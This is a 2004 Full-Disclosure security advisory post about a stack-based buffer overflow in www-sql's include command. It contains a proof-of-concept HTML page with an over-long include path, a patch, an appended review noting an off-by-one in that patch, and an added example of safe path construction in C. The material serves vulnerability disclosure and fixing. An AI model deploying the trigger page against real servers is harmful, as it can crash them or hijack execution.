[Full-Disclosure] Re: [SECURITY] [DSA 523-1] New www-sql packages fix buffer overflow
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Re: [SECURITY] [DSA 523-1] New www-sql packages fix buffer overflow
- From: Ulf Härnhammar <Ulf.Harnhammar.9485@xxxxxxxxxxxxx>
- Date: Sun, 20 Jun 2004 23:03:04 +0200
www-sql has an include command, allowing programs written in www-sql
to include files. The buffer overflow occurs when an include command
in a web page has a too long path, either one that is hardcoded or
one that is stored in a variable. The buffer overflow is stack-based
and gives you control over EIP.
In the special case where the include command uses a parameter
controlled by the web page's visitors (by form data or otherwise),
the overflow can be exploited remotely. Otherwise it is a local
privilege escalation.
I have attached a patch (against version 0.5.7) and a sample
web page.
// Ulf Harnhammar
Debian Security Audit Project
http://www.debian.org/security/audit/
<html>
<head>
<title>www-sql buffer overflow proof of concept</title>
</head>
<body>
<h1>www-sql buffer overflow proof of concept</h1>
test = <!sql print $test>
<br>
<!sql include
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU>
<!sql include $test>
</body>
</html>
--- cgi.c.old 1998-09-15 11:28:26.000000000 +0200
+++ cgi.c 2004-06-08 21:42:54.000000000 +0200
@@ -245,15 +245,19 @@
#endif
/* execution doesn't get this far if PATH_TRANSLATED isn't set */
+
pathtrans = getenv("PATH_TRANSLATED");
+ if (strlen(pathtrans) > 1001)
+ exit(117);
slash = strrchr(pathtrans, '/');
if (slash != NULL) {
strncpy(fname, pathtrans, (slash - pathtrans) + 1);
fname[slash - pathtrans + 1] = '\0';
- strcat(fname, name);
+ strncat(fname, name, 1024 - strlen(fname));
} else {
- strcpy(fname, name);
+ strncpy(fname, name, sizeof(fname));
}
+ fname[1023] = '\0';
f = fopen(fname, "r");
if (f == NULL)
fprintf(yyout, "<p><b>include</b> - can't open file %s</p>\n", fname);
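Review bot: the new `strncat(fname, name, 1024 - strlen(fname));` still allows a one-byte overflow of `fname`. `strncat` appends up to n bytes and then always writes a terminating NUL, so when `name` is longer than the remaining room the NUL lands at index `strlen(fname) + (1024 - strlen(fname))`, i.e. `fname[1024]`, one past the end of a 1024-byte buffer (the hunk does not show the declaration, but the added `fname[1023] = '\0';` and the `sizeof(fname)` in the else branch imply that size). The later `fname[1023] = '\0';` does not undo that write. The bound should leave room for the terminator: `strncat(fname, name, sizeof(fname) - strlen(fname) - 1);`. Two smaller points: the `> 1001` limit and `exit(117)` are unexplained magic numbers and deserve a comment tying them to the buffer size (with PATH_TRANSLATED capped at 1001 bytes, the prefix copied by the unchanged `strncpy` is at most 1001 bytes, which is why the check is sufficient); and the `else` branch's `strncpy(fname, name, sizeof(fname))` only stays NUL-terminated because of the trailing `fname[1023] = '\0';`, so that line must not be moved or dropped in later edits.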
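The bug described in the post is a classic unbounded `strcpy`/`strcat` into a fixed-size path buffer. The following is an added example, not www-sql's code and not part of Ulf's patch: it shows the shape a defensive version of that path construction can take, where the length check happens before any byte is copied and an oversized include name is rejected outright instead of being silently truncated (a truncated path could resolve to a different file than the page author intended). The function names `build_include_path` and `poc_name_is_rejected` are hypothetical, and the 1024-byte buffer size is assumed from the patch.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the patch hunk implies a 1024-byte fname but never
 * shows its declaration. */
#define FNAME_SIZE 1024

/* Hypothetical helper (not www-sql's own code). Builds
 * "<directory part of pathtrans><name>" into out[out_size] without ever
 * writing past the end of out.
 * Returns 0 on success, -1 on a NULL/empty argument, -2 if the result would
 * not fit (out is left untouched in that case). */
int build_include_path(const char *pathtrans, const char *name,
                       char *out, size_t out_size)
{
    if (pathtrans == NULL || name == NULL || out == NULL || out_size == 0)
        return -1;

    /* Directory prefix: everything up to and including the last '/'.
     * With no '/' at all, the prefix is empty, as in the original else branch. */
    const char *slash = strrchr(pathtrans, '/');
    size_t dir_len = (slash != NULL) ? (size_t)(slash - pathtrans) + 1 : 0;
    size_t name_len = strlen(name);

    /* Bounds check before copying: prefix + name + terminating NUL must fit.
     * Written as two comparisons so neither subtraction can wrap. */
    if (dir_len > out_size - 1 || name_len > out_size - 1 - dir_len)
        return -2;

    memcpy(out, pathtrans, dir_len);
    memcpy(out + dir_len, name, name_len);
    out[dir_len + name_len] = '\0';
    return 0;
}

/* Feeds a constructed over-long include name (mirroring the run of 'U's in
 * the proof-of-concept page) to the helper. Returns 1 if it is rejected. */
int poc_name_is_rejected(void)
{
    char longname[2048];            /* constructed input, 2047 'U's */
    char out[FNAME_SIZE];
    memset(longname, 'U', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    return build_include_path("/var/www/site/page.wsql", longname,
                              out, sizeof out) == -2;
}

int main(void)
{
    char fname[FNAME_SIZE];
    int rc = build_include_path("/var/www/site/index.wsql", "header.inc",
                                fname, sizeof fname);
    printf("normal include: rc=%d path=%s\n", rc, rc == 0 ? fname : "(none)");
    printf("over-long include name rejected: %s\n",
           poc_name_is_rejected() ? "yes" : "no");
    return 0;
}
```

The check uses `out_size` rather than a hard-coded 1024, so the helper stays correct if the caller's buffer is later resized; a safe truncating variant would replace the `-2` return with a `memcpy` of `out_size - 1 - dir_len` bytes, but for file paths rejection is the better default.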